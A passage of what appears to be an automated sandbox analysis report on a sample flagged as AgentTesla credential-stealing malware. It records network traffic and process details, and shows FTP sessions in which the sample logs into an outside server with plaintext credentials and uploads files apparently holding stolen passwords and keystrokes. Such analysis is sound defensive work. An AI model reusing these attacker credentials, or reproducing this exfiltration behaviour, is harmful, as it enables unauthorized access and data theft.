                                                      Jan 11, 2025 01:15:33.769680023 CET49717443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:33.779448986 CET49717443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:33.823333979 CET44349717104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:33.887706995 CET44349717104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:33.887767076 CET44349717104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:33.888134956 CET49717443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:33.890244961 CET49717443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:34.774183035 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:34.780000925 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:34.780087948 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:35.373526096 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:35.373754025 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:35.378623009 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:35.567496061 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:35.567634106 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:35.572480917 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:35.863121986 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:35.863270998 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:35.868150949 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:36.057035923 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:36.057446957 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:36.062356949 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:36.251548052 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:36.251746893 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:36.256592989 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:36.445424080 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:36.447154045 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:36.452004910 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:36.640790939 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:36.641309023 CET4972164074192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:36.646117926 CET6407449721213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:36.646306992 CET4972164074192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:36.646307945 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:36.651165009 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:37.203043938 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:37.203279972 CET4972164074192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:37.203375101 CET4972164074192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:37.208112955 CET6407449721213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:37.208399057 CET6407449721213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:37.208458900 CET4972164074192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:37.254054070 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:37.395586014 CET2149718213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:37.441536903 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:41.130614996 CET49725443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:41.130664110 CET44349725104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:41.134730101 CET49725443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:41.137892962 CET49725443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:41.137923956 CET44349725104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:41.611650944 CET44349725104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:41.611761093 CET49725443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:41.613543034 CET49725443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:41.613558054 CET44349725104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:41.613908052 CET44349725104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:41.660265923 CET49725443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:41.760977983 CET49725443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:41.807374954 CET44349725104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:41.871066093 CET44349725104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:41.871138096 CET44349725104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:41.873610020 CET49725443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:41.917671919 CET49725443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:42.542340040 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:42.547399044 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:42.547480106 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:42.641711950 CET4971821192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:43.157371998 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:43.157576084 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:43.162414074 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:43.353605986 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:43.353779078 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:43.358622074 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:43.627499104 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:43.627662897 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:43.632522106 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:43.823437929 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:43.823604107 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:43.828481913 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.030733109 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.030894041 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:44.035805941 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.226789951 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.227814913 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:44.232686043 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.423666000 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.424635887 CET4972763872192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:44.429734945 CET6387249727213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.430001020 CET4972763872192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:44.430083036 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:44.436573982 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.990879059 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.991137028 CET4972763872192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:44.991184950 CET4972763872192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:44.996048927 CET6387249727213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.996423960 CET6387249727213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:44.996483088 CET4972763872192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:45.035279989 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:45.185775995 CET2149726213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:45.238432884 CET4972621192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:55.161345005 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:55.166241884 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:55.166732073 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:55.793698072 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:55.793864965 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:55.798626900 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:55.985843897 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:55.985969067 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:55.990770102 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:56.280817032 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:56.281007051 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:56.285887003 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:56.474520922 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:56.474668026 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:56.479475975 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:56.667603970 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:56.669245005 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:56.674721003 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:56.861061096 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:56.861447096 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:56.866271973 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:57.053361893 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:57.054151058 CET4992963898192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:57.058995008 CET6389849929213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:57.059107065 CET4992963898192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:57.059230089 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:57.063997984 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:57.642431974 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:57.642731905 CET4992963898192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:57.642776012 CET4992963898192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:57.647574902 CET6389849929213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:57.647811890 CET6389849929213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:57.647871017 CET4992963898192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:57.691643953 CET4991721192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:16:57.836504936 CET2149917213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:16:57.879158974 CET4991721192.168.2.11213.189.52.181
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 11, 2025 01:15:20.902167082 CET5282653192.168.2.111.1.1.1
                                                      Jan 11, 2025 01:15:20.908967972 CET53528261.1.1.1192.168.2.11
                                                      Jan 11, 2025 01:15:23.128412008 CET4927253192.168.2.111.1.1.1
                                                      Jan 11, 2025 01:15:23.136982918 CET53492721.1.1.1192.168.2.11
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 11, 2025 01:15:20.902167082 CET192.168.2.111.1.1.10x9292Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Jan 11, 2025 01:15:23.128412008 CET192.168.2.111.1.1.10xfdbfStandard query (0)s4.serv00.comA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 11, 2025 01:15:20.908967972 CET1.1.1.1192.168.2.110x9292No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                      Jan 11, 2025 01:15:20.908967972 CET1.1.1.1192.168.2.110x9292No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                      Jan 11, 2025 01:15:20.908967972 CET1.1.1.1192.168.2.110x9292No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                      Jan 11, 2025 01:15:23.136982918 CET1.1.1.1192.168.2.110xfdbfNo error (0)s4.serv00.com213.189.52.181A (IP address)IN (0x0001)false
                                                      • api.ipify.org
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.1149711104.26.13.2054436412C:\Users\user\Desktop\ukBQ4ch2nE.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 00:15:22 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2025-01-11 00:15:22 UTC424INHTTP/1.1 200 OK
                                                      Date: Sat, 11 Jan 2025 00:15:22 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 12
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 9000b6440f8d1a13-EWR
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1923&min_rtt=1899&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1396461&cwnd=169&unsent_bytes=0&cid=1992ac3247691380&ts=529&x=0"
                                                      2025-01-11 00:15:22 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                      Data Ascii: 8.46.123.189


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.1149717104.26.13.2054431400C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 00:15:33 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2025-01-11 00:15:33 UTC424INHTTP/1.1 200 OK
                                                      Date: Sat, 11 Jan 2025 00:15:33 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 12
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 9000b68c7f1542b7-EWR
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1710&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1640449&cwnd=212&unsent_bytes=0&cid=6aa31f501f22356a&ts=172&x=0"
                                                      2025-01-11 00:15:33 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                      Data Ascii: 8.46.123.189


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.1149725104.26.13.2054433000C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 00:15:41 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2025-01-11 00:15:41 UTC424INHTTP/1.1 200 OK
                                                      Date: Sat, 11 Jan 2025 00:15:41 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 12
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 9000b6be5c6542a5-EWR
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1581&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1818181&cwnd=229&unsent_bytes=0&cid=9bd18bf76f46c2ef&ts=265&x=0"
                                                      2025-01-11 00:15:41 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                      Data Ascii: 8.46.123.189


                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Jan 11, 2025 01:15:23.733494997 CET2149712213.189.52.181192.168.2.11220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                      Jan 11, 2025 01:15:23.733726978 CET4971221192.168.2.11213.189.52.181USER f2241_evico
                                                      Jan 11, 2025 01:15:23.928324938 CET2149712213.189.52.181192.168.2.11331 User f2241_evico OK. Password required
                                                      Jan 11, 2025 01:15:23.928464890 CET4971221192.168.2.11213.189.52.181PASS Doll650#@
                                                      Jan 11, 2025 01:15:24.221513033 CET2149712213.189.52.181192.168.2.11230 OK. Current restricted directory is /
                                                      Jan 11, 2025 01:15:24.415559053 CET2149712213.189.52.181192.168.2.11504 Unknown command
                                                      Jan 11, 2025 01:15:24.415709972 CET4971221192.168.2.11213.189.52.181PWD
                                                      Jan 11, 2025 01:15:24.609350920 CET2149712213.189.52.181192.168.2.11257 "/" is your current location
                                                      Jan 11, 2025 01:15:24.609474897 CET4971221192.168.2.11213.189.52.181TYPE I
                                                      Jan 11, 2025 01:15:24.803018093 CET2149712213.189.52.181192.168.2.11200 TYPE is now 8-bit binary
                                                      Jan 11, 2025 01:15:24.803270102 CET4971221192.168.2.11213.189.52.181PASV
                                                      Jan 11, 2025 01:15:24.996920109 CET2149712213.189.52.181192.168.2.11227 Entering Passive Mode (213,189,52,181,255,236)
                                                      Jan 11, 2025 01:15:25.002924919 CET4971221192.168.2.11213.189.52.181STOR PW_user-436432_2025_01_10_19_15_22.html
                                                      Jan 11, 2025 01:15:25.560271978 CET2149712213.189.52.181192.168.2.11150 Accepted data connection
                                                      Jan 11, 2025 01:15:25.753854990 CET2149712213.189.52.181192.168.2.11226-File successfully transferred
                                                      226-File successfully transferred226 0.193 seconds (measured here), 1.75 Kbytes per second
                                                      Jan 11, 2025 01:15:35.373526096 CET2149718213.189.52.181192.168.2.11220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                      Jan 11, 2025 01:15:35.373754025 CET4971821192.168.2.11213.189.52.181USER f2241_evico
                                                      Jan 11, 2025 01:15:35.567496061 CET2149718213.189.52.181192.168.2.11331 User f2241_evico OK. Password required
                                                      Jan 11, 2025 01:15:35.567634106 CET4971821192.168.2.11213.189.52.181PASS Doll650#@
                                                      Jan 11, 2025 01:15:35.863121986 CET2149718213.189.52.181192.168.2.11230 OK. Current restricted directory is /
                                                      Jan 11, 2025 01:15:36.057035923 CET2149718213.189.52.181192.168.2.11504 Unknown command
                                                      Jan 11, 2025 01:15:36.057446957 CET4971821192.168.2.11213.189.52.181PWD
                                                      Jan 11, 2025 01:15:36.251548052 CET2149718213.189.52.181192.168.2.11257 "/" is your current location
                                                      Jan 11, 2025 01:15:36.251746893 CET4971821192.168.2.11213.189.52.181TYPE I
                                                      Jan 11, 2025 01:15:36.445424080 CET2149718213.189.52.181192.168.2.11200 TYPE is now 8-bit binary
                                                      Jan 11, 2025 01:15:36.447154045 CET4971821192.168.2.11213.189.52.181PASV
                                                      Jan 11, 2025 01:15:36.640790939 CET2149718213.189.52.181192.168.2.11227 Entering Passive Mode (213,189,52,181,250,74)
                                                      Jan 11, 2025 01:15:36.646307945 CET4971821192.168.2.11213.189.52.181STOR PW_user-436432_2025_01_10_19_15_34.html
                                                      Jan 11, 2025 01:15:37.203043938 CET2149718213.189.52.181192.168.2.11150 Accepted data connection
                                                      Jan 11, 2025 01:15:37.395586014 CET2149718213.189.52.181192.168.2.11226-File successfully transferred
                                                      226-File successfully transferred226 0.192 seconds (measured here), 1.76 Kbytes per second
                                                      Jan 11, 2025 01:15:43.157371998 CET2149726213.189.52.181192.168.2.11220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                      Jan 11, 2025 01:15:43.157576084 CET4972621192.168.2.11213.189.52.181USER f2241_evico
                                                      Jan 11, 2025 01:15:43.353605986 CET2149726213.189.52.181192.168.2.11331 User f2241_evico OK. Password required
                                                      Jan 11, 2025 01:15:43.353779078 CET4972621192.168.2.11213.189.52.181PASS Doll650#@
                                                      Jan 11, 2025 01:15:43.627499104 CET2149726213.189.52.181192.168.2.11230 OK. Current restricted directory is /
                                                      Jan 11, 2025 01:15:43.823437929 CET2149726213.189.52.181192.168.2.11504 Unknown command
                                                      Jan 11, 2025 01:15:43.823604107 CET4972621192.168.2.11213.189.52.181PWD
                                                      Jan 11, 2025 01:15:44.030733109 CET2149726213.189.52.181192.168.2.11257 "/" is your current location
                                                      Jan 11, 2025 01:15:44.030894041 CET4972621192.168.2.11213.189.52.181TYPE I
                                                      Jan 11, 2025 01:15:44.226789951 CET2149726213.189.52.181192.168.2.11200 TYPE is now 8-bit binary
                                                      Jan 11, 2025 01:15:44.227814913 CET4972621192.168.2.11213.189.52.181PASV
                                                      Jan 11, 2025 01:15:44.423666000 CET2149726213.189.52.181192.168.2.11227 Entering Passive Mode (213,189,52,181,249,128)
                                                      Jan 11, 2025 01:15:44.430083036 CET4972621192.168.2.11213.189.52.181STOR PW_user-436432_2025_01_10_19_15_42.html
                                                      Jan 11, 2025 01:15:44.990879059 CET2149726213.189.52.181192.168.2.11150 Accepted data connection
                                                      Jan 11, 2025 01:15:45.185775995 CET2149726213.189.52.181192.168.2.11226-File successfully transferred
                                                      226-File successfully transferred226 0.194 seconds (measured here), 1.74 Kbytes per second
                                                      Jan 11, 2025 01:16:55.793698072 CET2149917213.189.52.181192.168.2.11220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 01:16. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 01:16. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 01:16. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                      Jan 11, 2025 01:16:55.793864965 CET4991721192.168.2.11213.189.52.181USER f2241_evico
                                                      Jan 11, 2025 01:16:55.985843897 CET2149917213.189.52.181192.168.2.11331 User f2241_evico OK. Password required
                                                      Jan 11, 2025 01:16:55.985969067 CET4991721192.168.2.11213.189.52.181PASS Doll650#@
                                                      Jan 11, 2025 01:16:56.280817032 CET2149917213.189.52.181192.168.2.11230 OK. Current restricted directory is /
                                                      Jan 11, 2025 01:16:56.474520922 CET2149917213.189.52.181192.168.2.11504 Unknown command
                                                      Jan 11, 2025 01:16:56.474668026 CET4991721192.168.2.11213.189.52.181PWD
                                                      Jan 11, 2025 01:16:56.667603970 CET2149917213.189.52.181192.168.2.11257 "/" is your current location
                                                      Jan 11, 2025 01:16:56.669245005 CET4991721192.168.2.11213.189.52.181TYPE I
                                                      Jan 11, 2025 01:16:56.861061096 CET2149917213.189.52.181192.168.2.11200 TYPE is now 8-bit binary
                                                      Jan 11, 2025 01:16:56.861447096 CET4991721192.168.2.11213.189.52.181PASV
                                                      Jan 11, 2025 01:16:57.053361893 CET2149917213.189.52.181192.168.2.11227 Entering Passive Mode (213,189,52,181,249,154)
                                                      Jan 11, 2025 01:16:57.059230089 CET4991721192.168.2.11213.189.52.181STOR KL_user-436432_2025_01_24_23_57_06.html
                                                      Jan 11, 2025 01:16:57.642431974 CET2149917213.189.52.181192.168.2.11150 Accepted data connection
                                                      Jan 11, 2025 01:16:57.836504936 CET2149917213.189.52.181192.168.2.11226-File successfully transferred
                                                      226-File successfully transferred226 0.192 seconds (measured here), 1.43 Kbytes per second

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:1
                                                      Start time:19:15:19
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\ukBQ4ch2nE.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\ukBQ4ch2nE.exe"
                                                      Imagebase:0xef0000
                                                      File size:985'600 bytes
                                                      MD5 hash:74421477FAFAF6BEB9D8E3806E1F6643
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:19:15:19
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\ukBQ4ch2nE.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\ukBQ4ch2nE.exe"
                                                      Imagebase:0x550000
                                                      File size:985'600 bytes
                                                      MD5 hash:74421477FAFAF6BEB9D8E3806E1F6643
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:19:15:32
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                      Imagebase:0xc00000
                                                      File size:985'600 bytes
                                                      MD5 hash:74421477FAFAF6BEB9D8E3806E1F6643
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 74%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:19:15:32
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                      Imagebase:0xa90000
                                                      File size:985'600 bytes
                                                      MD5 hash:74421477FAFAF6BEB9D8E3806E1F6643
